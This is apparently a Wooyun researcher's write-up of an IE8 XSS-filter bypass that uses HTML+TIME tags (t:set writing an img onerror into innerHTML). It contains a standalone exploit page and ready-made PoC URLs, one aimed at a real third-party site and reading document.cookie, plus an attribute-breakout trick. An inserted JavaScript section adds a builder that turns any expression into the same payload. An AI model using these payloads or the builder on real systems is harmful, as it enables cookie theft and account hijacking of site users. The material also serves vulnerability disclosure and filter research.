Note: IE 10 has fixed this issue, and IE8 ...

-------------------------------------------------

1. A <?import ... > tag can also be written as an <import ...> tag.

<html>
<body>
<div>
<div id="x">x</div>
<!-- declare the t: prefix and bind it to the HTML+TIME behavior (#default#time2);
     <import> is accepted here in place of <?import> -->
<xml:namespace prefix="t">
<import namespace="t" implementation="#default#time2">
<!-- t:set writes the value of "to" into x.innerHTML; &#11; (vertical tab) is used
     as an in-tag separator instead of spaces -->
<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">
</div>
</body>
</html>

The code above executes the script fragment carried in the "to" attribute: <t:set> assigns it to the innerHTML of the element with id x, the injected <img> fails to load x:x, and its onerror handler runs.

Furthermore, we found that this XSS vector, built from the three tags (<xml:namespace>, <import> and <t:set ...>), bypasses the IE8 XSS filter.

------------------------------------------------

POC1: use <import ...>

http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>

Using <?import ...> instead triggers the XSS filter, which intercepts the payload.

2. When the injection point is inside an attribute value, as in <input type="text" value="{attacker-controlled parameter}">, our payload has to begin with "> to break out of the attribute. That "> triggers the XSS filter, which then neuters words such as 'namespace' and 'attributeName' in our code. My friend @jackmasa (https://twitter.com/jackmasa) (@Sogili in Wooyun.org) gave me a trick to solve the problem: "x> (where x is any letter) does not trigger the filter.

-------------------------------------------------

POC2:

http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>
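The two PoC URLs above pass through three encoding layers before anything runs: the server URL-decodes the parameter, reflects it into the page, and the HTML parser then entity-decodes the unquoted "to" attribute that <t:set> copies into x.innerHTML. The following is an added example (not code from the original post) that models those layers for POC1 and POC2: it decodes each PoC down to the markup that ends up in innerHTML, makes the &#11; vertical-tab separators visible, and builds the "to=" value back from an arbitrary expression in the same form the post uses. The "id=> breakout from point 2 shows up as the prefix of the decoded search parameter. Only the encoding is modelled; IE's HTML+TIME behavior and its XSS filter are not simulated, and the parameter names "page" and "search" are simply read off the PoC URLs.

```javascript
// Added example, not code from the original post: model the encoding layers
// of the <t:set ... to=...> payloads. The parameter is (1) URL-decoded by the
// server, (2) reflected as an unquoted attribute value that ends at the first
// whitespace or '>', and (3) entity-decoded by the HTML parser; the result is
// what t:set writes into x.innerHTML. IE's XSS filter is NOT simulated here.

// The PoC URLs from the post, copied verbatim.
const POC1 =
  'http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div>' +
  '<xml:namespace prefix=t><import namespace=t implementation=%23default%23time2>' +
  '<t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x' +
  '%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>';
const POC2 =
  'http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div>' +
  '<xml:namespace prefix=t><import namespace=t implementation=%23default%23time2>' +
  '<t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x' +
  '%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>';

// Layer 1: pull one query parameter and URL-decode it. The query is split on
// '&' before decoding, which is why the payload carries its '&' as %26.
function getQueryParam(url, name) {
  const query = url.slice(url.indexOf('?') + 1);
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (key === name) return decodeURIComponent(eq === -1 ? '' : pair.slice(eq + 1));
  }
  return null;
}

// Layer 2: the unquoted "to" attribute of the <t:set> tag runs up to the first
// whitespace or '>'; at this point it still holds the undecoded entities.
function extractToAttribute(markup) {
  const m = /<t:set[\s\/][^>]*?\bto=([^\s>]+)/i.exec(markup);
  return m ? m[1] : null;
}

// Layer 3: minimal entity decoder covering the entities the payload uses.
function decodeEntities(s) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"' };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|lt|gt|amp|quot);/gi, (_, body) => {
    const b = body.toLowerCase();
    if (named[b] !== undefined) return named[b];
    const code = b.startsWith('#x') ? parseInt(b.slice(2), 16) : parseInt(b.slice(1), 10);
    return String.fromCodePoint(code);
  });
}

// The string that t:set assigns to document.getElementById('x').innerHTML.
function injectedInnerHtml(url, param) {
  const reflected = getQueryParam(url, param);
  const raw = reflected === null ? null : extractToAttribute(reflected);
  return raw === null ? null : decodeEntities(raw);
}

// Make the vertical tabs (&#11;) visible as "\v"; the post uses them instead
// of spaces so the attribute value stays a single token inside <t:set>.
function showWhitespace(s) {
  return s.replace(/\x0b/g, '\\v');
}

// Reverse direction: build the "to=" value for an arbitrary JS expression in
// the same form as the PoCs (parentheses as hex entities, VT separators), then
// percent-encode only '&' and '#' so the server's URL-decoding restores them.
function buildToAttribute(jsExpr) {
  const entityForm =
    '&lt;img&#11;src=x:x&#11;onerror&#11;=alert&#x28;' + jsExpr + '&#x29;&gt;';
  return entityForm.replace(/[&#]/g, c => '%' + c.charCodeAt(0).toString(16).toUpperCase());
}

console.log(showWhitespace(injectedInnerHtml(POC1, 'page')));
console.log(showWhitespace(injectedInnerHtml(POC2, 'search')));
console.log(getQueryParam(POC2, 'search').slice(0, 24)); // starts with the "id=> breakout
console.log(buildToAttribute('document.cookie'));
```

Running it prints `<img\vsrc=x:x\vonerror\v=alert(1)>` for POC1, which is exactly the fragment the <t:set> in point 1 carries in its "to" attribute, and the builder reproduces the "to=" value of POC1 byte for byte when given the expression 1. Where the filter's word-replacement from point 2 applies, only the decoded first layer is affected, so the "id=> prefix is what has to survive, and the rest of the payload rides below it in entity form.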

That's all. Thanks to my friend jackmasa (@Sogili in Wooyun.org) for his help.

Author: Gainover

Group:  PKAV .net & Wooyun.org

From: http://zone.wooyun.org/content/1411